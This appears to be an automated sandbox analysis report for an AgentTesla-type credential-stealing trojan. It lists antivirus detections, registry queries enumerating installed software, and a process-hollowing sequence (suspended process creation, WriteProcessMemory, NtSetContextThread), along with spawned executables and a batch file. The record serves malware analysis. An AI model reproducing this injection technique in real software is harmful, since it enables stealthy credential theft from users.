RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

Elastic	malicious (high confidence)
FireEye	Generic.mg.b2c1396260a5bf72
Cylance	Unsafe
CrowdStrike	win/malicious_confidence_60% (W)
BitDefenderTheta	Gen:NN.ZemsilF.34628.hr1@aq2fkMkG
Avast	FileRepMetagen [Malware]
Kaspersky	HEUR:Trojan-PSW.MSIL.Agensla.gen
APEX	Malicious
McAfee-GW-Edition	Artemis!Trojan
Ikarus	Trojan-Spy.Agent
Microsoft	Trojan:Win32/AgentTesla!ml
Cynet	Malicious (score: 90)
McAfee	Artemis!B2C1396260A5
Malwarebytes	Malware.AI.4227227409
AVG	FileRepMetagen [Malware]
Qihoo-360	Win32/TrojanSpy.AgentTesla.HgIASRIA

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 4244 called NtSetContextThread to modify thread in remote process 8620
NtSetContextThread March 22, 2021, 5:35 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4319386 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002b0 process_identifier: 8620	1	0	0

Appends a known CryptoMix ransomware file extension to files that have been encrypted (1 event)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 4244 resumed a thread in remote process 8620
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 8620	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 53 events)

Time & API	Arguments	Status	Return
NtResumeThread March 22, 2021, 5:34 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 4244	1	0
NtResumeThread March 22, 2021, 5:34 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 4244	1	0
NtResumeThread March 22, 2021, 5:34 p.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 4244	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 4244	1	0
NtGetContextThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000000e0	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 4244	1	0
CreateProcessInternalW March 22, 2021, 5:35 p.m.	thread_identifier: 3388 thread_handle: 0x000002b0 process_identifier: 8620 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\clr3.exe track: 1 command_line: "{path}" filepath_r: C:\Users\test22\AppData\Local\Temp\clr3.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002b4	1	1
NtGetContextThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000002b0	1	0
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 155648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002b4	1	0
WriteProcessMemory March 22, 2021, 5:35 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELhzãà0ìè @ `@HèO Ô@,è H.texthè ì `.rsrcÔ ð@@.reloc@ø@B base_address: 0x00400000 process_identifier: 8620 process_handle: 0x000002b4	1	1
WriteProcessMemory March 22, 2021, 5:35 p.m.	buffer: base_address: 0x00402000 process_identifier: 8620 process_handle: 0x000002b4	1	1
WriteProcessMemory March 22, 2021, 5:35 p.m.	buffer: P8hÔ DD4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¤StringFileInfo000004b0,FileDescription 0FileVersion0.0.0.06InternalNameFinale.exe(LegalCopyright >OriginalFilenameFinale.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0ä"êï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00422000 process_identifier: 8620 process_handle: 0x000002b4	1	1
WriteProcessMemory March 22, 2021, 5:35 p.m.	buffer: à8 base_address: 0x00424000 process_identifier: 8620 process_handle: 0x000002b4	1	1
WriteProcessMemory March 22, 2021, 5:35 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 8620 process_handle: 0x000002b4	1	1
NtSetContextThread March 22, 2021, 5:35 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4319386 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002b0 process_identifier: 8620	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 8620	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 8620	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 8620	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000180 suspend_count: 1 process_identifier: 8620	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 8620	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000228 suspend_count: 1 process_identifier: 8620	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000003a8 suspend_count: 1 process_identifier: 8620	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000006b4 suspend_count: 1 process_identifier: 8620	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x0000071c suspend_count: 1 process_identifier: 8620	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000260 suspend_count: 1 process_identifier: 8620	1	0
CreateProcessInternalW March 22, 2021, 5:35 p.m.	thread_identifier: 6980 thread_handle: 0x000007d0 process_identifier: 1892 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\srvs.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\srvs.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\srvs.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000007d8	1	1
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000770 suspend_count: 1 process_identifier: 8620	1	0
CreateProcessInternalW March 22, 2021, 5:35 p.m.	thread_identifier: 8004 thread_handle: 0x000007d8 process_identifier: 3100 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\swnetwork.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\swnetwork.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\swnetwork.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000007f0	1	1
CreateProcessInternalW March 22, 2021, 5:35 p.m.	thread_identifier: 2600 thread_handle: 0x00000134 process_identifier: 4420 current_directory: filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-5IS72.tmp\srvs.tmp" /SL5="$3503F2,9285237,79360,C:\Users\test22\AppData\Local\Temp\srvs.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000012c	1	1
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000001a8 suspend_count: 1 process_identifier: 4420	1	0
CreateProcessInternalW March 22, 2021, 5:35 p.m.	thread_identifier: 3944 thread_handle: 0x0000021c process_identifier: 2424 current_directory: C:\ProgramData filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\uacwev.bat"" filepath_r: stack_pivoted: 0 creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE) inherit_handles: 0 process_handle: 0x0000023c	1	1
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000114 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000184 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000224 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000238 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000003e0 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000660 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000698 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000724 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000758 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000774 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x0000078c suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000007a8 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000007c0 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000007d0 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x000007f4 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000810 suspend_count: 1 process_identifier: 3100	1	0
NtResumeThread March 22, 2021, 5:35 p.m.	thread_handle: 0x00000828 suspend_count: 1 process_identifier: 3100	1	0

clr3.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All